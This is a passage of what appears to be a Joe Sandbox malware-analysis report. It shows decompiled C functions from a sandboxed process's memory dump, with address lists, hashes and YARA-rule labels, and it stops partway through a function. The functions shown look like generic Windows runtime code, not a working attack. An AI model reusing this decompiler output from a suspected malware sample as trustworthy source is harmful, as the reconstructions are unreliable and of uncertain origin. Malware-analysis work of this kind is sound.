                                                    0x00abe730
                                                    0x00abe736
                                                    0x00abe738
                                                    0x00abe73d
                                                    0x00abe73e
                                                    0x00abe740
                                                    0x00abe749
                                                    0x00abe765
                                                    0x00abe76a
                                                    0x00abe76b
                                                    0x00abe76c
                                                    0x00abe76d
                                                    0x00abe76e
                                                    0x00abe76f
                                                    0x00abe775
                                                    0x00abe777
                                                    0x00abe77e
                                                    0x00afb675
                                                    0x00abe784
                                                    0x00abe784
                                                    0x00abe789
                                                    0x00abe7a8
                                                    0x00abe7ac
                                                    0x00abe807
                                                    0x00abe7ae
                                                    0x00abe7ae
                                                    0x00abe7b1
                                                    0x00abe7b4
                                                    0x00abe7b9
                                                    0x00abe7c0
                                                    0x00abe7c4
                                                    0x00abe7ca
                                                    0x00abe7cc
                                                    0x00000000
                                                    0x00abe7d3
                                                    0x00abe7d6
                                                    0x00000000
                                                    0x00000000
                                                    0x00abe7ff
                                                    0x00abe802
                                                    0x00000000
                                                    0x00000000
                                                    0x00abe7f9
                                                    0x00abe7fc
                                                    0x00000000
                                                    0x00000000
                                                    0x00abe7f3
                                                    0x00abe7f6
                                                    0x00000000
                                                    0x00000000
                                                    0x00abe7ed
                                                    0x00abe7f0
                                                    0x00000000
                                                    0x00000000
                                                    0x00abe7e7
                                                    0x00abe7ea
                                                    0x00000000
                                                    0x00000000
                                                    0x00afb685
                                                    0x00afb688
                                                    0x00000000
                                                    0x00000000
                                                    0x00afb682
                                                    0x00000000
                                                    0x00000000
                                                    0x00abe7cc
                                                    0x00abe7d9
                                                    0x00abe7dc
                                                    0x00abe7de
                                                    0x00abe7de
                                                    0x00abe7ac
                                                    0x00abe7e4
                                                    0x00abe74b
                                                    0x00abe751
                                                    0x00abe759
                                                    0x00abe761
                                                    0x00abe761

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c307638bc730b218e01290205282ed4d50c45498e6271c00356f132497d5e081
                                                    • Instruction ID: a676ebda0023ffde69ec5a6454abf9e1d12f1bdd4bf741ddd5ff3a59443d48b7
                                                    • Opcode Fuzzy Hash: c307638bc730b218e01290205282ed4d50c45498e6271c00356f132497d5e081
                                                    • Instruction Fuzzy Hash: AD316D75A14249EFD744CF58D841F9AB7E8FB09314F148256F908CB342DA31ED90CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ABBC2C Relevance: .1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 67%
                                                    			E00ABBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0xb76100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E00AA2280(0xd, 0x394f1a0);
				_t41 =  *0xb760f8; // 0x0
				if(_t41 != 0) {
					 *0xb760f8 =  *_t41;
					 *0xb760fc =  *0xb760fc + 0xffff;
				}
				E00A9FFB0(_t41, 0x800, 0x394f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0xb760f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L00AA4620(0xb76100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0xb76100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                                    0x00abbc36
                                                    0x00abbc42
                                                    0x00abbc45
                                                    0x00abbc4a
                                                    0x00abbd35
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00abbc50
                                                    0x00abbc50
                                                    0x00abbc58
                                                    0x00abbc5a
                                                    0x00abbc60
                                                    0x00000000
                                                    0x00000000
                                                    0x00afa4f2
                                                    0x00afa4f6
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00afa4fc
                                                    0x00abbc79
                                                    0x00abbc7e
                                                    0x00abbc86
                                                    0x00abbd16
                                                    0x00abbd20
                                                    0x00abbd20
                                                    0x00abbc8d
                                                    0x00abbc94
                                                    0x00abbcbd
                                                    0x00abbcca
                                                    0x00abbccb
                                                    0x00abbccc
                                                    0x00abbccd
                                                    0x00abbcce
                                                    0x00abbcd4
                                                    0x00abbcea
                                                    0x00abbcee
                                                    0x00abbcf2
                                                    0x00abbd00
                                                    0x00abbd04
                                                    0x00000000
                                                    0x00abbc96
                                                    0x00abbcab
                                                    0x00abbcaf
                                                    0x00abbd2c
                                                    0x00abbd2c
                                                    0x00abbd09
                                                    0x00000000
                                                    0x00abbd09
                                                    0x00abbcb1
                                                    0x00abbcb5
                                                    0x00abbcbb
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00abbcbb

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7571d5ad87d3bf5a6efc1ec8613aba9176d06de59025face69f6bae5b8ba92eb
                                                    • Instruction ID: 96866c63e88300f05a8bce8aeeefd3c344c917a17d73c8c4bd8a87b1698ed942
                                                    • Opcode Fuzzy Hash: 7571d5ad87d3bf5a6efc1ec8613aba9176d06de59025face69f6bae5b8ba92eb
                                                    • Instruction Fuzzy Hash: 6931EE32A20A159FCB11DF58C8C1BE677B8FB19311F544079ED48EB242EBB8DD458BA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AB1DB5 Relevance: .1, Instructions: 87COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 60%
                                                    			E00AB1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E00AAF460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L00AA4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E00AAF460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                                    0x00ab1dc2
                                                    0x00ab1dc5
                                                    0x00ab1dc7
                                                    0x00ab1dcc
                                                    0x00ab1dce
                                                    0x00ab1dd6
                                                    0x00ab1ddf
                                                    0x00ab1de0
                                                    0x00ab1de1
                                                    0x00ab1de5
                                                    0x00ab1de8
                                                    0x00ab1def
                                                    0x00ab1df0
                                                    0x00ab1df6
                                                    0x00ab1df7
                                                    0x00ab1dfe
                                                    0x00ab1e1a
                                                    0x00000000
                                                    0x00000000
                                                    0x00ab1e0b
                                                    0x00ab1e12
                                                    0x00ab1e12
                                                    0x00ab1e00
                                                    0x00ab1e00
                                                    0x00ab1e05
                                                    0x00ab1e1e
                                                    0x00ab1e23
                                                    0x00af570f
                                                    0x00af5713
                                                    0x00000000
                                                    0x00000000
                                                    0x00af5719
                                                    0x00af5719
                                                    0x00ab1e2c
                                                    0x00ab1e2d
                                                    0x00ab1e2e
                                                    0x00ab1e2f
                                                    0x00ab1e31
                                                    0x00ab1e32
                                                    0x00ab1e35
                                                    0x00ab1e3d
                                                    0x00af5723
                                                    0x00af573d
                                                    0x00af573d
                                                    0x00000000
                                                    0x00af5723
                                                    0x00ab1e49
                                                    0x00ab1e4e
                                                    0x00ab1e4e
                                                    0x00ab1e09
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                    • Instruction ID: 428bae36ab16971cb56126567fa3cb092b9a2d578d509595126cb0a1356a1856
                                                    • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                    • Instruction Fuzzy Hash: 33218B32A00218AFC720CF99CD95EBBBBBDEF86740F514065F90197251D634EE01DBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00A89100 Relevance: .1, Instructions: 87COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 76%
                                                    			E00A89100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0xb5f6e8);
				E00ADD0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E00B588F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E00ADD130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0xb786c0; // 0x6307b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0xb786b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E00AA2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E00B588F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E00ACAFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0xb7b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0xb784c0;
										if(_t69 >=  *0xb784c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E00B59063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E00A8922A(_t82);
							_t53 = E00AA7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E00B58B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0xb786c0; // 0x6307b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0xb786b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0xb786bc;
										_t72 = 0xb786b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E00A89240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0xb786c4;
									_t72 = 0xb786c0;
									L18:
									E00AB9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                                    0x00a89100
                                                    0x00a89100
                                                    0x00a89100
                                                    0x00a89100
                                                    0x00a89102
                                                    0x00a89107
                                                    0x00a8910c
                                                    0x00a89110
                                                    0x00a89115
                                                    0x00a89136
                                                    0x00a89143
                                                    0x00ae37e4
                                                    0x00ae37e4
                                                    0x00a89149
                                                    0x00a8914e
                                                    0x00a8914e
                                                    0x00a89117
                                                    0x00a8911d
                                                    0x00000000
                                                    0x00000000
                                                    0x00a8911f
                                                    0x00a89125
                                                    0x00000000
                                                    0x00a89151
                                                    0x00a89158
                                                    0x00a8915d
                                                    0x00a89161
                                                    0x00a89168
                                                    0x00ae3715
                                                    0x00000000
                                                    0x00a8916e
                                                    0x00a8916e
                                                    0x00a89175
                                                    0x00a89177
                                                    0x00a8917e
                                                    0x00a8917f
                                                    0x00a89182
                                                    0x00a89182
                                                    0x00a89187
                                                    0x00a89187
                                                    0x00a8918a
                                                    0x00a8918d
                                                    0x00a8918f
                                                    0x00a89192
                                                    0x00a89195
                                                    0x00a89198
                                                    0x00a89198
                                                    0x00a89198
                                                    0x00a8919a
                                                    0x00000000
                                                    0x00000000
                                                    0x00ae371f
                                                    0x00ae3721
                                                    0x00ae3727
                                                    0x00ae372f
                                                    0x00ae3733
                                                    0x00ae3735
                                                    0x00ae3738
                                                    0x00ae373b
                                                    0x00ae373d
                                                    0x00ae3740
                                                    0x00000000
                                                    0x00000000
                                                    0x00ae3746
                                                    0x00ae3749
                                                    0x00000000
                                                    0x00000000
                                                    0x00ae374f
                                                    0x00ae3751
                                                    0x00000000
                                                    0x00000000
                                                    0x00ae3757
                                                    0x00ae3759
                                                    0x00ae375c
                                                    0x00ae375c
                                                    0x00ae375e
                                                    0x00ae375e
                                                    0x00ae3761
                                                    0x00ae3764
                                                    0x00000000
                                                    0x00000000
                                                    0x00ae3766
                                                    0x00ae3768
                                                    0x00ae37a3
                                                    0x00ae37a3
                                                    0x00ae37a5
                                                    0x00ae37a7
                                                    0x00ae37ad
                                                    0x00ae37b0
                                                    0x00ae37b2
                                                    0x00ae37bc
                                                    0x00ae37c2
                                                    0x00ae37c2
                                                    0x00ae37b2
                                                    0x00a89187
                                                    0x00a89187
                                                    0x00a8918a
                                                    0x00a8918d
                                                    0x00a8918f
                                                    0x00a89192
                                                    0x00a89195
                                                    0x00000000
                                                    0x00a89195
                                                    0x00000000
                                                    0x00a89187
                                                    0x00ae376a
                                                    0x00ae376a
                                                    0x00ae376c
                                                    0x00ae376c
                                                    0x00ae376f
                                                    0x00ae3775
                                                    0x00000000
                                                    0x00000000
                                                    0x00ae3777
                                                    0x00ae3779
                                                    0x00000000
                                                    0x00000000
                                                    0x00ae3782
                                                    0x00ae3787
                                                    0x00ae3789
                                                    0x00ae3790
                                                    0x00ae3790
                                                    0x00ae378b
                                                    0x00ae378b
                                                    0x00ae378b
                                                    0x00ae3792
                                                    0x00ae3795
                                                    0x00ae3795
                                                    0x00ae3798
                                                    0x00ae3798
                                                    0x00ae379b
                                                    0x00ae379b
                                                    0x00a891a3
                                                    0x00a891a9
                                                    0x00a891b0
                                                    0x00a891b4
                                                    0x00a891b4
                                                    0x00a891bb
                                                    0x00a891c0
                                                    0x00a891c5
                                                    0x00a891c7
                                                    0x00ae37da
                                                    0x00a891cd
                                                    0x00a891cd
                                                    0x00a891cd
                                                    0x00a891d2
                                                    0x00a891d5
                                                    0x00a89239
                                                    0x00a89239
                                                    0x00a891d7
                                                    0x00a891db
                                                    0x00a891e1
                                                    0x00a891e7
                                                    0x00a891fd
                                                    0x00a89203
                                                    0x00a8921e
                                                    0x00a89223
                                                    0x00000000
                                                    0x00a89223
                                                    0x00a89205
                                                    0x00a89208
                                                    0x00a8920c
                                                    0x00a89214
                                                    0x00a89214
                                                    0x00a891e9
                                                    0x00a891e9
                                                    0x00a891ee
                                                    0x00a891f3
                                                    0x00a891f3
                                                    0x00a891f3
                                                    0x00a891e7
                                                    0x00000000
                                                    0x00a891db
                                                    0x00a89187
                                                    0x00a89168

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 601ff11c4cc381dcdb3464d1ca82ccd004972272cd340b232b60ddc13e97dbcf
                                                    • Instruction ID: e3b8acab37b8a4b1c92093169ab1eaedee78503bce49bd3dea7d1e13bbbf0792
                                                    • Opcode Fuzzy Hash: 601ff11c4cc381dcdb3464d1ca82ccd004972272cd340b232b60ddc13e97dbcf
                                                    • Instruction Fuzzy Hash: 6131E675A04286EFDB61EF68C58C7BEBBF1BB49310F2C8299D40967251D734AD80CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AA0050 Relevance: .1, Instructions: 81COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 53%
                                                    			E00AA0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0xb7d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E00AB9ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E00ACB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E00B58A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E00AB9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0xb7b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                                    0x00aa0055
                                                    0x00aa005d
                                                    0x00aa0062
                                                    0x00aa006c
                                                    0x00aa006f
                                                    0x00aa0074
                                                    0x00aa007a
                                                    0x00aa007a
                                                    0x00aa0080
                                                    0x00aa0080
                                                    0x00aa0087
                                                    0x00aa008d
                                                    0x00aa008f
                                                    0x00aa0093
                                                    0x00aa0095
                                                    0x00aa009b
                                                    0x00aa00f8
                                                    0x00aa00fb
                                                    0x00aa00fc
                                                    0x00aa00ff
                                                    0x00aa0108
                                                    0x00aa0108
                                                    0x00aa00a2
                                                    0x00aa00a6
                                                    0x00aa00b3
                                                    0x00aa00bc
                                                    0x00aa00c5
                                                    0x00aa00ca
                                                    0x00aec01e
                                                    0x00000000
                                                    0x00000000
                                                    0x00aec02d
                                                    0x00aa00d5
                                                    0x00aa00d9
                                                    0x00aec03d
                                                    0x00aec046
                                                    0x00aec046
                                                    0x00aa00df
                                                    0x00aa00e2
                                                    0x00aa00ea
                                                    0x00aa00ef
                                                    0x00aa00f2
                                                    0x00aa00f6
                                                    0x00aa0111
                                                    0x00aa0117
                                                    0x00aa0117
                                                    0x00000000
                                                    0x00aa00f6
                                                    0x00aa00d0
                                                    0x00aa00d0
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b5acd78a19a11433ef21153858aad88c7b803125559743536415899c3c4cc2c3
                                                    • Instruction ID: 0435256e1dcd9076d9a52dc4a24b3f7719e4f97ea3f58587231f054ac43c1a5c
                                                    • Opcode Fuzzy Hash: b5acd78a19a11433ef21153858aad88c7b803125559743536415899c3c4cc2c3
                                                    • Instruction Fuzzy Hash: 33318931611B04CFD722CF28C941F9AB3E5FF89714F24456DE59A87AA0EB35AC02CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B06C0A Relevance: .1, Instructions: 79COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 77%
                                                    			E00B06C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E00AA7D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0xb77b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L00AA4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E00ACF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E00AA7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E00AC9AE0();
						_t23 = L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                                                    0x00b06c0a
                                                    0x00b06c0f
                                                    0x00b06c10
                                                    0x00b06c13
                                                    0x00b06c15
                                                    0x00b06c19
                                                    0x00b06c1c
                                                    0x00b06c21
                                                    0x00b06c28
                                                    0x00b06c3a
                                                    0x00b06c2a
                                                    0x00b06c33
                                                    0x00b06c33
                                                    0x00b06c3f
                                                    0x00b06c48
                                                    0x00b06c4d
                                                    0x00b06c60
                                                    0x00b06c65
                                                    0x00b06c69
                                                    0x00b06c73
                                                    0x00b06c79
                                                    0x00b06c7f
                                                    0x00b06c86
                                                    0x00b06c90
                                                    0x00b06c94
                                                    0x00b06ca6
                                                    0x00b06cb2
                                                    0x00b06cbd
                                                    0x00b06cbd
                                                    0x00b06cc3
                                                    0x00b06cc7
                                                    0x00b06ccb
                                                    0x00b06cd0
                                                    0x00b06cd1
                                                    0x00b06ce2
                                                    0x00b06ce2
                                                    0x00b06c69
                                                    0x00b06ced

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f1a39b531bea0ee8a87fcb5978d929f6d5ed46fc89ee69fc712eb2d3bb164339
                                                    • Instruction ID: 8d3855ce4d911adc305da6889bd77c9675f323d335d25c6e961c25a791f1fb52
                                                    • Opcode Fuzzy Hash: f1a39b531bea0ee8a87fcb5978d929f6d5ed46fc89ee69fc712eb2d3bb164339
                                                    • Instruction Fuzzy Hash: EA219A71A00644AFD721DB68D980F2AB7A8FF48740F1400A9F849DB791E734ED20CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AC90AF Relevance: .1, Instructions: 76COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 82%
                                                    			E00AC90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
